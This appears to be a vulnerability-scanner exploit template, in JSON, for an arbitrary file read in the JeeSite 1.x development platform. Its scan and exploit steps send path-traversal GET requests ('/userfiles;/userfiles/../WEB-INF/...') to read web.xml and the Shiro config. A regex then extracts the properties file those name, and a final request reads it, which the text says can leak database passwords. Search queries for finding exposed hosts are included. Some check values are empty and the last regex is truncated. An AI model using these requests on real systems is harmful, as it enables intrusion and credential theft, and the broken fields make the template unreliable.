{ "Name": "JEESITE V1.2.7 File Read", "Description": "

JeeSite is a high-efficiency, high-performance, and strong security open source Java EE rapid development platform based on a number of excellent open source projects, highly integrated and packaged.

In JeeSite 1.x version, the UserfilesDownloadServlet function improperly handles the related URL, which leads to the existence of arbitrary file reading vulnerabilities.

", "Product": "JeeSite", "Homepage": "https://jeesite.com/", "DisclosureDate": "2021-10-24", "Author": "sharecast.net@gmail.com", "FofaQuery": "app=\"JeeSite\"", "GobyQuery": "app=\"JeeSite\"", "Level": "2", "Impact": "

In JeeSite 1.x version, the UserfilesDownloadServlet function improperly handles the related URL, which leads to the existence of arbitrary file reading vulnerabilities.

", "Recommendation": "

The vendor has released a bug fix, please pay attention to the update in time: https://jeesite.com

1. Set access policies and whitelist access through security devices such as firewalls.

2.If not necessary, prohibit public network access to the system.

", "Translation": { "CN": { "Name": "JEESITE 快速开发平台 V1.2.7版本任意文件读取漏洞", "VulType": ["fileread"], "Tags": ["fileread"], "Description": "

JeeSite是基于多个优秀的开源项目,高度整合封装而成的高效,高性能,强安全性的开源Java EE快速开发平台。

在JeeSite 1.x版本中由于UserfilesDownloadServlet函数对相关URL处理不当,导致其存在任意文件读取漏洞。

", "Impact": "

攻击者读取任意文件,导致系统敏感配置文件泄露,进而导致数据库密码或者敏感文件泄露,影响用户数据等风险。

", "Product": "JeeSite", "Recommendation": "

1、更新至4.x版本,官方地址:

https://jeesite.com/

2、临时解决方案,建议使用WAF进行过滤,安装参考:

https://github.com/SpiderLabs/ModSecurity/wiki

" } }, "References": [ "http://www.yulegeyu.com/2021/06/19/JEESITE-V1-2-7-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/" ], "Is0day": false, "HasExp": true, "ExpParams": [ { "name": "cmd", "type": "input", "value": "../WEB-INF/classes/spring-context-shiro.xml", "show": "" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/userfiles;/userfiles/../WEB-INF/web.xml", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$body", "operation": "contains", "value": "", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "", "bz": "" }, { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/userfiles;/userfiles/{{{cmd}}}", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [ "conf|lastbody|regex|location=\"classpath:(.*?\\.properties)\"" ] }, { "Request": { "method": "GET", "uri": "/userfiles;/userfiles/../WEB-INF/classes/{{{conf}}}", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|([." ] } ], "Tags": [ "fileread" ], "VulType": [ "fileread" ], "CVEIDs": [ "" ], "CNNVD": [ "" ], "CNVD": [ "" ], "CVSSScore": "7", "AttackSurfaces": { "Application": null, "Support": null, "Service": null, "System": null, "Hardware": null } }